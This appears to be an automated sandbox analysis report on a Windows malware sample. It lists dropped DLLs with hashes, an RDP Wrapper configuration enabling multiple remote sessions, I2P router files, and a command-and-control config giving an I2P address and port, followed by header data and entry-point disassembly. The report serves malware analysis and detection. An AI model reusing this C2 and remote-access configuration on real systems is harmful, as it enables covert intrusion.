                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(.....`......\...............................................R.....`... ..............................................................`..................d............................I..(......................h............................text...............................`..`.data...............................@....rdata.. T.......V..................@..@.pdata.......`.......8..............@..@.xdata..4....p.......B..............@..@.bss....@................................edata...............L..............@..@.idata...............N..............@....CRT....X............^..............@....tls.................`..............@....reloc..d............b..............@..B........................................................................................................................................................................
                                                    Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                    File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                    Category:dropped
                                                    Size (bytes):105984
                                                    Entropy (8bit):6.2884725801282775
                                                    Encrypted:false
                                                    SSDEEP:1536:wPwNKEKbLqYQtCwCxJtpyYNPvo3cxwNn6anP8XOCYA8CSs8qgu06wCYA8CSs8qgm:gwnKvqTaxJtpRP7wNbnP8Xf
                                                    MD5:91A0DD29773FBFB7112C5FCFF1873C13
                                                    SHA1:E1EAF1EFB134CAA7DA5AAA362830A68AB705C023
                                                    SHA-256:AE2D023EBBFEEFD5A26EAA255AD3862C9A1C276BB0B46FF88EA9A9999406D6B6
                                                    SHA-512:F7A665A218BB2CCEC32326B0E0A9845B2981F17445B5CB54BBA7D6EF9E200B4538EBD19916C2DACB0BBE1B409C14A499B23BA707874AE1F1B154279C90DC33DD
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(............\........................................@......K.....`... .........................................^.......................T............0..h...............................(.......................`............................text...X...........................`..`.data........ ......................@....rdata..Pc...0...d..................@..@.pdata..T............n..............@..@.xdata...............x..............@..@.bss....@................................edata..^...........................@..@.idata..............................@....CRT....X...........................@....tls......... ......................@....reloc..h....0......................@..B........................................................................................................................................................................
                                                    Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):37376
                                                    Entropy (8bit):5.7181012847214445
                                                    Encrypted:false
                                                    SSDEEP:768:2aS6Ir6sXJaE5I2IaK3knhQ0NknriB0dX5mkOpw:aDjDtKA0G0j5Opw
                                                    MD5:E3E4492E2C871F65B5CEA8F1A14164E2
                                                    SHA1:81D4AD81A92177C2116C5589609A9A08A5CCD0F2
                                                    SHA-256:32FF81BE7818FA7140817FA0BC856975AE9FCB324A081D0E0560D7B5B87EFB30
                                                    SHA-512:59DE035B230C9A4AD6A4EBF4BEFCD7798CCB38C7EDA9863BC651232DB22C7A4C2D5358D4D35551C2DD52F974A22EB160BAEE11F4751B9CA5BF4FB6334EC926C6
                                                    Malicious:false
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........qc..qc..qc......qc...`..qc...g..qc..qb..qc...b..qc...f..qc...c..qc...j..qc......qc...a..qc.Rich.qc.................PE..d...#............." .....Z...>.......]...............................................a....`A.........................................~..........@...............................\... x..T............................p...............q..P............................text....Y.......Z.................. ..`.rdata.......p.......^..............@..@.data...P............z..............@....pdata...............|..............@..@.rsrc...............................@..@.reloc..\...........................@..B........................................................................................................................................................................................................................................................
                                                    Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                    File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                    Category:dropped
                                                    Size (bytes):115712
                                                    Entropy (8bit):6.277217301921545
                                                    Encrypted:false
                                                    SSDEEP:1536:UsmIeUIfJAH791hpVMjqZm4S53kp21ahrvffvTn+33333333333333333333333L:I5fJAHZ1Kj7hkUYr3TlX8Y/biF
                                                    MD5:D0F0423AEEE6B6FF6754D860603D46D0
                                                    SHA1:A06F3B9605B3398BA68154DA39ADF26DDEE41743
                                                    SHA-256:81DA68F52DF2ED997C374CCBEFC56849650770FB30EDA8F202BBC7FC3FE6A51D
                                                    SHA-512:C30FAEDE4520FF1C859B8B39E351112CFC60DAECA98B1359F9F86AB79BCFB996BA84F35A5B178B4ABEC66152864720E58F741AE13D06B64913E240A1F9E6A633
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(............\........................................P............`... .........................................^....................................@..p...............................(...................X................................text...8...........................`..`.data........0......."..............@....rdata..pi...@...j...$..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^...........................@..@.idata..............................@....CRT....X.... ......................@....tls.........0......................@....reloc..p....@......................@..B........................................................................................................................................................................
                                                    Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                    File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                    Category:dropped
                                                    Size (bytes):92672
                                                    Entropy (8bit):6.242846530333761
                                                    Encrypted:false
                                                    SSDEEP:1536:Eb84+EBwpVmTx3sJg0jsEv5YqKnbGGOO5YhNDE:Eb84+EB7x3sJXwExKb/OOv
                                                    MD5:FDCF93ACD089B505B524DDFA0FF947F9
                                                    SHA1:A2BADA5807BA001758DBCE46DA634332A5CC14C2
                                                    SHA-256:ADFE373F98CABF338577963DCEA279103C19FF04B1742DC748B9477DC0156BB4
                                                    SHA-512:110455DC5C3F090A1341EE6D09D9B327CD03999C70D4A2C0B762B91BC334B0448E750CB1FD7B34CE729B8E1CD33B55A4E1FA1187586C2FF8850B2FD907AFE03E
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(.....f......\.........Io....................................C.....`... .........................................^....................`..................l............................J..(....................................................text...............................`..`.data...............................@....rdata...U.......V..................@..@.pdata.......`.......<..............@..@.xdata.......p.......F..............@..@.bss....`................................edata..^............P..............@..@.idata...............R..............@....CRT....X............d..............@....tls.................f..............@....reloc..l............h..............@..B........................................................................................................................................................................
                                                    Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                    File Type:ASCII text
                                                    Category:dropped
                                                    Size (bytes):8568
                                                    Entropy (8bit):4.958673415285098
                                                    Encrypted:false
                                                    SSDEEP:96:e+I8WTr7LjdL33ZqPDNLWBsaBMG+xv9G86UJ5TMmyvmyLKkfUZleZnE/Ndm/7CIg:e+I8Mr7VtXl1zrrIqEVdm/7CItWR0SX
                                                    MD5:27535CEE6740DFC50A78A0322415E67C
                                                    SHA1:E80541CF15C8ED4C5EEDA8D8C24674A5B8A27F61
                                                    SHA-256:FB0CDBF4E0215AE1866E97860C2AC3DD96E7498BFE2AF3D82378041CDFF7F292
                                                    SHA-512:25F11A8262B5A2F59BD6C9D8673B5AD5A140EAE8C007244810B2924EB08B5CF54AE19E61BE5139319877278D11868BBD85BD2E6C67F5FAD4E2A458E2844EBC0C
                                                    Malicious:false
                                                    Preview:## Configuration file for a typical i2pd user.## See https://i2pd.readthedocs.io/en/latest/user-guide/configuration/.## for more options you can use in this file...## Lines that begin with "## " try to explain what's going on. Lines.## that begin with just "#" are disabled commands: you can enable them.## by removing the "#" symbol...## Tunnels config file.## Default: ~/.i2pd/tunnels.conf or /var/lib/i2pd/tunnels.conf.# tunconf = /var/lib/i2pd/tunnels.conf..## Tunnels config files path.## Use that path to store separated tunnels in different config files..## Default: ~/.i2pd/tunnels.d or /var/lib/i2pd/tunnels.d.# tunnelsdir = /var/lib/i2pd/tunnels.d..## Path to certificates used for verifying .su3, families.## Default: ~/.i2pd/certificates or /var/lib/i2pd/certificates.# certsdir = /var/lib/i2pd/certificates..## Where to write pidfile (default: /run/i2pd.pid, not used in Windows).# pidfile = /run/i2pd.pid..## Logging configuration section.## By default logs go to stdout with level 'inf
                                                    Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                    File Type:PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                    Category:dropped
                                                    Size (bytes):9146880
                                                    Entropy (8bit):6.674868432808522
                                                    Encrypted:false
                                                    SSDEEP:196608:DiRu5DnWLX6Cs3E1CPwDvt3uF8c339CME:DiRsCKCsU1CPwDvt3uFd9CME
                                                    MD5:676064A5CC4729E609539F9C9BD9D427
                                                    SHA1:F77BA3D5B6610B345BFD4388956C853B99C9EB60
                                                    SHA-256:77D203E985A0BC72B7A92618487389B3A731176FDFC947B1D2EAD92C8C0E766B
                                                    SHA-512:4C876E9C1474E321C94EA81058B503D695F2B5C9DCA9182C515F1AE6DE065099832FD0337D011476C553958808C7D6F748566734DEEE6AF1E74B45A690181D02
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f..........."...).t]......R..0........................................P............`... .......................................z..t... ...,............p..?...........p...............................`m.(....................*...............................text...(r]......t].................`..`.data.........]......x].............@....rdata..`>...@^..@....^.............@..@.pdata...?....p..@...^p.............@..@.xdata...t....t..v....t.............@..@.bss....`Q...@z..........................edata...t....z..v....z.............@..@.idata...,... ......................@....CRT....`....P......................@....tls.........`......................@....reloc.......p......................@..B........................................................................................................................................................................
                                                    Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                    File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                    Category:dropped
                                                    Size (bytes):129024
                                                    Entropy (8bit):6.313152038164236
                                                    Encrypted:false
                                                    SSDEEP:3072:Ex6tEkLvf8H5KRjus59IoZzhoesVR8ssT/nv:mEJ5qoZzfTX
                                                    MD5:C89542ABA45CE1084760AE8DE6EAE09E
                                                    SHA1:603560A3E4B6A8CB906CA98C907373ADBF4D3B1C
                                                    SHA-256:1B6E559DC0CB37EBB2311C7CBF01B039F0DC1C3EC6DA057837451A531B1E2CB0
                                                    SHA-512:60A0EB698AFE25CDDDB133FC937FEE478F1E0F8AF72B825C19BB2D544FAFCC217BABF6DD3D01704A106677E92AAE3DD57538E34731C950DA17F5715DF0732FF6
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(.:..........\.........,.....................................,j....`... ...................................... ..^....0..D............................p..l...............................(...................p5...............................text...(9.......:..................`..`.data........P.......>..............@....rdata.......`.......@..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^.... ......................@..@.idata..D....0......................@....CRT....X....P......................@....tls.........`......................@....reloc..l....p......................@..B........................................................................................................................................................................
                                                    Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                    File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                    Category:dropped
                                                    Size (bytes):104448
                                                    Entropy (8bit):6.259370376612282
                                                    Encrypted:false
                                                    SSDEEP:1536:VQbC3TviBZTprAFnfkRAJhzTjvlsy2nD+cRi6ZQOobsAx34:VGC3TKBZTWJfImTjx2D+ei6ZQOkx34
                                                    MD5:7A8E8A0842D8D65713DEE5393E806755
                                                    SHA1:AF6F3A52009FBF62C21A290EFC34A94C151B683E
                                                    SHA-256:51C131081921626D22FAF44977D5E4DCFE00E5D6CDDEDA877A82F13631BE7C2E
                                                    SHA-512:D1B8D93B7EFBEAA348D3A01293AD5D92BC8F28EB2554DF5E6E71506D00D135390082C52C18D0BC3F0439B068777D8B2C43AAED930C72E5FFAB2593EEAC470CF4
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(............\.........?..............................0............`... .........................................^.......................$............ ..l............................v..(.......................`............................text...............................`..`.data...............................@....rdata...a... ...b..................@..@.pdata..$............h..............@..@.xdata..T............r..............@..@.bss.... ................................edata..^............|..............@..@.idata...............~..............@....CRT....X...........................@....tls................................@....reloc..l.... ......................@..B........................................................................................................................................................................
                                                    Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                    File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                    Category:dropped
                                                    Size (bytes):115200
                                                    Entropy (8bit):6.220212606349767
                                                    Encrypted:false
                                                    SSDEEP:1536:GQTj0nA3CwwEWLUbltMR8tGZ9G+Yv953a6nfgXqobk5l:GQP02C7LUbltdQG+Yra64Xqo45l
                                                    MD5:BE6174AE2B452DA9D00F9C7C4D8A675B
                                                    SHA1:0ABD2C76C82416AE9C30124C43802E2E49C8ED28
                                                    SHA-256:A62BDF318386AAAB93F1D25144CFBDC1A1125AAAD867EFC4E49FE79590181EBF
                                                    SHA-512:5631B1595F8CEE8C0DFA991852259FEE17EA8B73A9EED900A10450BBB7C846ACFC88C32930BE379D60EFA6AE1BBBEAD0A605A9F36E20129B53BCA36B13BA5858
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(............\........."h.............................P......7F....`... .........................................^....................................@..l...........................@...(.......................h............................text...(...........................`..`.data........0......................@....rdata..`d...@...f...(..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^...........................@..@.idata..............................@....CRT....X.... ......................@....tls.........0......................@....reloc..l....@......................@..B........................................................................................................................................................................
                                                    Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                    File Type:Generic INItialization configuration [SLPolicy]
                                                    Category:dropped
                                                    Size (bytes):441513
                                                    Entropy (8bit):5.449545529389614
                                                    Encrypted:false
                                                    SSDEEP:768:yUoDQVQpXQq4WDi9SUnpB8fbQnxJcy8RMFdKKb8x8Rr/d6gl/+f8jZ0ftlFn4m7N:eJGYB33L+MUIiG4IvREWddadl/Fy/k9u
                                                    MD5:5FCB4B6362E04A8D1C6ECD33AD246FB9
                                                    SHA1:E198D3E81C4B8527451133BCEAFA799D2115A8BB
                                                    SHA-256:060EE1BCB5817709F2D73BB1762C5ABCA09FAF5271E8F90503A84F9657ECDCD9
                                                    SHA-512:B5839D79D1A34DA86BA9B34A9105F7CC05E642C99D84D55E3E88833544DCE9FDD840F7ABF0F09CD4470734F24CA7C600C3C64E4041A4481806590D3B7A6A032D
                                                    Malicious:false
                                                    Preview:; RDP Wrapper Library configuration..; Do not modify without special knowledge..; Edited by sebaxakerhtc....[Main]..Updated=2024-08-21..LogFile=\rdpwrap.txt..SLPolicyHookNT60=1..SLPolicyHookNT61=1....[SLPolicy]..TerminalServices-RemoteConnectionManager-AllowRemoteConnections=1..TerminalServices-RemoteConnectionManager-AllowMultipleSessions=1..TerminalServices-RemoteConnectionManager-AllowAppServerMode=1..TerminalServices-RemoteConnectionManager-AllowMultimon=1..TerminalServices-RemoteConnectionManager-MaxUserSessions=0..TerminalServices-RemoteConnectionManager-ce0ad219-4670-4988-98fb-89b14c2f072b-MaxSessions=0..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-MaxSessions=2..TerminalServices-RDP-7-Advanced-Compression-Allowed=1..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-LocalOnly=0..TerminalServices-RemoteConnectionManager-8dc86f1d-9969-4379-91c1-06fe1dc60575-MaxSessions=1000..TerminalServices-DeviceRedirection-Licenses-TS
                                                    Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):62449
                                                    Entropy (8bit):7.807149241969407
                                                    Encrypted:false
                                                    SSDEEP:1536:uzSVMhnCwJEZ4dJ4douBYaGGIW2QzPzp343mR:vKE29uBFBo2R
                                                    MD5:688FDFAE15F328A84E8F19F8F4193AF2
                                                    SHA1:C65D4CDA0C93B84154DFBC065AE78B9E2F7ECFA8
                                                    SHA-256:8D37FF2458FDE376A41E9E702A9049FF89E78B75669C0F681CFCAFBA9D49688E
                                                    SHA-512:F19BC7F204DBE3449ABE9494BFFF8BE632F20F1B4B8272F0AF71C4CEC344A20617C0909C024CB4A4E0C6B266D386CB127554DC70F3A6AA7A81DAF1A8748F5D2D
                                                    Malicious:false
                                                    Preview:I2Psu3.................................1726476901......reseed@cnc.netPK.........E0Y.L.`........;...routerInfo-CVE7qh1P~hZ~PX2FDY6wRTmrdDd1eQ5Nv7yBC0EcH-o=.dat.^...)....?E4T{w...U........5.x.Z*T.v...C..~m.....r.u.._..0*._>a....B.......1in..o...R...M.....2.0..1...?.&..1@.._.s....KrbA.-..5c..Nzvep.KU.s.n...Gy.E.y...GU.c..A.i.[HU..{I@v..5c.-..53....5..f Kpp..c....:.N..I..u..~~..u....%a........~F>.&.9..I..........\..Ff&..f...!CL!#.!....[.3..:.......J....:..DO...B.l.\gc....r...P__W[..C[......_.d#wG.t....ts.rG. .R.@...b....*c..t..#[...l......D.....<.0...B. ].4...P....(...J...>2.02243....}dll`aan`bj...................%...F..~Q......>....If.a..%..!...E......@...BD...d:..!.b'sDZ.5k^j.g.H\..JI..../..IM,N.N-.:..Z.I"(..$............+..e.....Y..[_...U....t.....n8CEbM...k.%W.^....`i..&[.Y.{}...d.Vn.g..0...PK.........>0Y....:.......;...routerInfo-7xGNdz1Bi17~K7q9lFTjGVPnQdN0tqNJ-xpZt5MSp1Q=.dat{lr...~./..<Yw_...".....%..E.....O..l.(.R<K^...>.i..{.D.s-.+...
                                                    Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                    File Type:Generic INItialization configuration [cnccli]
                                                    Category:dropped
                                                    Size (bytes):214
                                                    Entropy (8bit):5.0997449470012635
                                                    Encrypted:false
                                                    SSDEEP:6:1EVQLD4oeMuJO+70X1YIzODSVkXpTRL9gWVUDeLn:CjogJO+70X1YeCS2X9vgpKL
                                                    MD5:26702FAAB91B6B144715714A96728F39
                                                    SHA1:CBDC34FC8FD3559CD49475FB5BC76176A5F88FF8
                                                    SHA-256:83D30846DD5576DE38A512B17163419D22FF35F2F5B0FE613C401E8A5A25B7A4
                                                    SHA-512:50D35D3DCD60B6E57C1A277E6C3E7AFBB5C2B46425732FC5A9FD3C0A55FEBF5AB3F05411A83CEC230AAC40199774FF78F30848D57D1E04A11B9E60777B038289
                                                    Malicious:false
                                                    Preview:[main]..version=400004957b19a09d..[cnccli]..server_host=c21a8709..server_port=41674..server_timeo=15000..i2p_try_num=10..i2p_sam3_timeo=30000..i2p_addr=2lyi6mgj6tn4eexl6gwnujwfycmq7dcus2x42petanvpwpjlqrhq.b32.i2p..
                                                    Process:C:\Windows\System32\WerFault.exe
                                                    File Type:MS Windows registry file, NT/2000 or above
                                                    Category:dropped
                                                    Size (bytes):1835008
                                                    Entropy (8bit):4.468688843745489
                                                    Encrypted:false
                                                    SSDEEP:6144:IzZfpi6ceLPx9skLmb0foZWSP3aJG8nAgeiJRMMhA2zX4WABluuN7jDH5S:eZHtoZWOKnMM6bFpVj4
                                                    MD5:9791BAE5FAB0F94EE20D4A05BC6A7C81
                                                    SHA1:6E5EA4D25E30A8C733F844A40C097DC9EB39D5FF
                                                    SHA-256:474CFC1C619393D40C10F30CEE1C502007D6FD052E8299BAE718C46D9172285F
                                                    SHA-512:E509B407A6128BC21331A869FD638AA299AE5EDCFFE6D2900B592CD7B4AAC758903CF612E67B2D12F0B6073E6061EDADAB793BD42F7FD0EE8C82925028A3C60C
                                                    Malicious:false
                                                    Preview:regfI...I....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.F>.................................................................................................................................................................................................................................................................................................................................................\0(.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                    Entropy (8bit):6.026248680279594
                                                    TrID:
                                                    • Win64 Executable GUI (202006/5) 92.64%
                                                    • Win64 Executable (generic) (12005/4) 5.51%
                                                    • Generic Win/DOS Executable (2004/3) 0.92%
                                                    • DOS Executable Generic (2002/1) 0.92%
                                                    • VXD Driver (31/22) 0.01%
                                                    File name:file.exe
                                                    File size:5'654'528 bytes
                                                    MD5:d2ecf5f2a271da094867f6dc31b3d60e
                                                    SHA1:b8b7ec24a5c6f1a0ad96e989003516b656256d2e
                                                    SHA256:99a5de18c71cfd7fd32d3f2b5bf4a60a4b2aa41f9bdbafa042693375927d11b1
                                                    SHA512:9b6f1a5ccf1c7312cf0a7bcbf253516d8ae9f56cc5408d6fd209e0bc26eca9237b6fed0fddd94746bba14c4f5560f279cf933647facf31a77762e05f66ff365d
                                                    SSDEEP:49152:wDShb1KwGF4Ilow5sADndfK0IptgSoP6MRM2BTXwmlPJmqHc4h/:VQK0/lX9PJhHc
                                                    TLSH:6B464A3F72A4C269C15EC17FC1A7CF40E533B9795B33C6E742A106689A168C75EBE620
                                                    File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win64..$7.......................................................................................................................................
                                                    Icon Hash:1f6c6cececf16117
                                                    Entrypoint:0x83d530
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                    DLL Characteristics:
                                                    Time Stamp:0x670ABB69 [Sat Oct 12 18:09:45 2024 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:5
                                                    OS Version Minor:2
                                                    File Version Major:5
                                                    File Version Minor:2
                                                    Subsystem Version Major:5
                                                    Subsystem Version Minor:2
                                                    Import Hash:bf7e94a88b651f53cc57bdb23fcd2c2f
                                                    Instruction
                                                    push ebp
                                                    dec eax
                                                    sub esp, 20h
                                                    dec eax
                                                    mov ebp, esp
                                                    nop
                                                    dec eax
                                                    lea ecx, dword ptr [FFFEF838h]
                                                    call 00007FA9081D2030h
                                                    dec eax
                                                    mov eax, dword ptr [0005F064h]
                                                    dec eax
                                                    mov ecx, dword ptr [eax]
                                                    call 00007FA908485961h
                                                    dec eax
                                                    mov eax, dword ptr [0005F055h]
                                                    dec eax
                                                    mov ecx, dword ptr [eax]
                                                    mov dl, 01h
                                                    call 00007FA908488610h
                                                    dec eax
                                                    mov eax, dword ptr [0005F044h]
                                                    dec eax
                                                    mov ecx, dword ptr [eax]
                                                    dec eax
                                                    mov edx, dword ptr [FFFEF0CAh]
                                                    dec esp
                                                    mov eax, dword ptr [0005F5D3h]
                                                    call 00007FA908485963h
                                                    dec eax
                                                    mov eax, dword ptr [0005F027h]
                                                    dec eax
                                                    mov ecx, dword ptr [eax]
                                                    call 00007FA908485B74h
                                                    call 00007FA9081C9A3Fh
                                                    jmp 00007FA9085F7F2Ah
                                                    nop
                                                    nop
                                                    call 00007FA9081C9C36h
                                                    nop
                                                    dec eax
                                                    lea esp, dword ptr [ebp+20h]
                                                    pop ebp
                                                    ret
                                                    dec eax
                                                    nop
                                                    dec eax
                                                    lea eax, dword ptr [00000000h+eax]
                                                    dec eax
                                                    sub esp, 28h
                                                    call 00007FA9081C91CCh
                                                    dec eax
                                                    add esp, 28h
                                                    ret
                                                    int3
                                                    int3
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    NameVirtual AddressVirtual Size Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x4ae0000x97.edata
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x4a80000x48de.idata
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x52a0000x4b400.rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x4eb0000x3e9c4.pdata
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x4b10000x39178.reloc
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS0x4b00000x28.rdata
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT0x4a92c00x1130.idata
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x4ad0000xe3c.didata
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                    .text0x10000x43c5c00x43c6004dc050f2b4f53a64168d2d2b3bb04cf6unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                    .data0x43e0000x5ee380x5f000c96c0455df11a9306f23138f836838b1False0.22957699424342104data4.71291425546474IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .bss0x49d0000xaab40x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .idata0x4a80000x48de0x4a00586f243f7059a7c5e3cc1599e712e400False0.24266258445945946data4.353393974383116IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .didata0x4ad0000xe3c0x1000cffac5f732be0532b2a4d072e873b001False0.2392578125data3.075608222202654IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .edata0x4ae0000x970x20032e00411291ba873b0de75e561276889False0.251953125data1.8329856927687613IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .tls0x4af0000x1e40x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .rdata0x4b00000x6d0x200cb0aedb4d69d2e7d3f915611730f186cFalse0.1953125data1.375717479766274IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .reloc0x4b10000x391780x392003895bdffdd7a3e7f1d857eb7488e8413False0.469976579595186data6.475527769134284IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                    .pdata0x4eb0000x3e9c40x3ea006086c296052ff020a33a7ba75c81e109False0.491813248502994data6.369980557431763IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .rsrc0x52a0000x4b4000x4b4006ac1aadc717308fa144f050a1a349f13False0.5633175872093024data6.403217845607993IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                    RT_CURSOR0x52aca80x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                                                    RT_CURSOR0x52addc0x134dataEnglishUnited States0.4642857142857143
                                                    RT_CURSOR0x52af100x134dataEnglishUnited States0.4805194805194805
                                                    RT_CURSOR0x52b0440x134dataEnglishUnited States0.38311688311688313
                                                    RT_CURSOR0x52b1780x134dataEnglishUnited States0.36038961038961037
                                                    RT_CURSOR0x52b2ac0x134dataEnglishUnited States0.4090909090909091
                                                    RT_CURSOR0x52b3e00x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                                                    RT_ICON0x52b5140xea8Device independent bitmap graphic, 48 x 96 x 8, image size 26880.4147121535181237
                                                    RT_ICON0x52c3bc0x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 11520.476985559566787
                                                    RT_ICON0x52cc640x568Device independent bitmap graphic, 16 x 32 x 8, image size 3200.48554913294797686
                                                    RT_ICON0x52d1cc0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 96000.5167012448132781
                                                    RT_ICON0x52f7740x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 42240.5719981238273921
